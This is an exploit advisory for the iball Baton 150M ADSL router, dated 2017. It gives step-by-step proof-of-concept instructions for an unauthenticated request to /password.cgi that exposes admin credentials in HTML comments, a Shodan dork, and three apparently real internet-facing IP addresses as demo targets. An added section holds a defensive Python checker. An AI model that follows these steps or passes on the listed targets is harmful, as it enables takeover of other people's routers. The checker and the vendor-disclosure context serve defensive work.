== Title: iball Baton 150M Wireless Router - Authentication Remote Bypass
== Date: 31/08/2017
== Product: iball Baton 150M Wireless-N ADSL2+ Router
== link: http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
== Credit: Indrajith.A.N - Informacion - Anonymous
== Dork: Iball Baton 150M
=== Results: approx. 1,297
== How to use: visit "https://www.shodan.io/", log in with your account, then search for Iball Baton 150M
== Firmware Version : 1.2.6 build 110401 Rel.47776n
== Hardware Version : iB-WRA150N v1 00000001
=== Proof Of Concept:
================
=== 1) Navigate to the router's login page, which is usually the IPv4 default gateway IP,
i.e. 172.20.174.1
=== 2) Now just append password.cgi to the URL, i.e.
http://172.20.174.1/password.cgi
=== 3) Right-click and view the page source, which discloses the username, password
and user role of the admin in the comment section
=== 4) Successfully logged in using the disclosed credentials
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
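Added example (not part of the original advisory): a check an administrator can run over a captured response from their own router's /password.cgi, requested without logging in, to tell whether the disclosure described in steps 2 and 3 is present or has been fixed. The comment layout in the sample body and the keyword list are assumptions, since the advisory does not show the exact markup; only field names are reported, never the values.

```python
import re

# Assumption: words that mark a credential field inside an HTML comment.
CRED_WORDS = re.compile(r"\b(user(?:name)?|pass(?:word|wd)?|pwd|role|admin)\b", re.I)
HTML_COMMENT = re.compile(r"<!--(.*?)-->", re.S)

def audit_password_cgi(status, body):
    """Classify one unauthenticated response to GET /password.cgi.

    Returns (verdict, fields). 'fields' lists the credential-like field
    names found in HTML comments; the values themselves are never returned.
    """
    # The device asked for credentials or bounced the request: expected state.
    if status in (401, 403) or 300 <= status < 400:
        return ("protected", [])
    if status != 200:
        return ("inconclusive", [])
    fields = set()
    for comment in HTML_COMMENT.findall(body):
        for match in CRED_WORDS.finditer(comment):
            fields.add(match.group(1).lower())
    if fields:
        return ("exposed", sorted(fields))
    # Page is served without a login but no credential fields are in comments.
    return ("reachable", [])

# Constructed sample bodies (placeholders, not real device output).
VULN_BODY = (
    "<html><body><form action='password.cgi'></form>\n"
    "<!-- username=EXAMPLE_USER password=EXAMPLE_PASS role=EXAMPLE_ROLE -->\n"
    "</body></html>"
)
CLEAN_BODY = "<html><body><!-- page footer --><p>Change password</p></body></html>"

if __name__ == "__main__":
    for label, status, body in [
        ("affected firmware (constructed)", 200, VULN_BODY),
        ("login enforced (constructed)", 401, ""),
        ("no secrets in comments (constructed)", 200, CLEAN_BODY),
    ]:
        print(label, "->", audit_password_cgi(status, body))
```

An "exposed" or "reachable" verdict means the page is still served without authentication; the admin password should be changed and remote management access from the WAN side restricted until the vendor supplies a fix.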
== D3m0$:
-- view-source:http://59.89.76.155/password.cgi
-- view-source:http://103.61.202.185/password.cgi
-- view-source:http://122.173.74.202/password.cgi
Disclosure Timeline:
======================================
Vendor Notification: March 5, 2017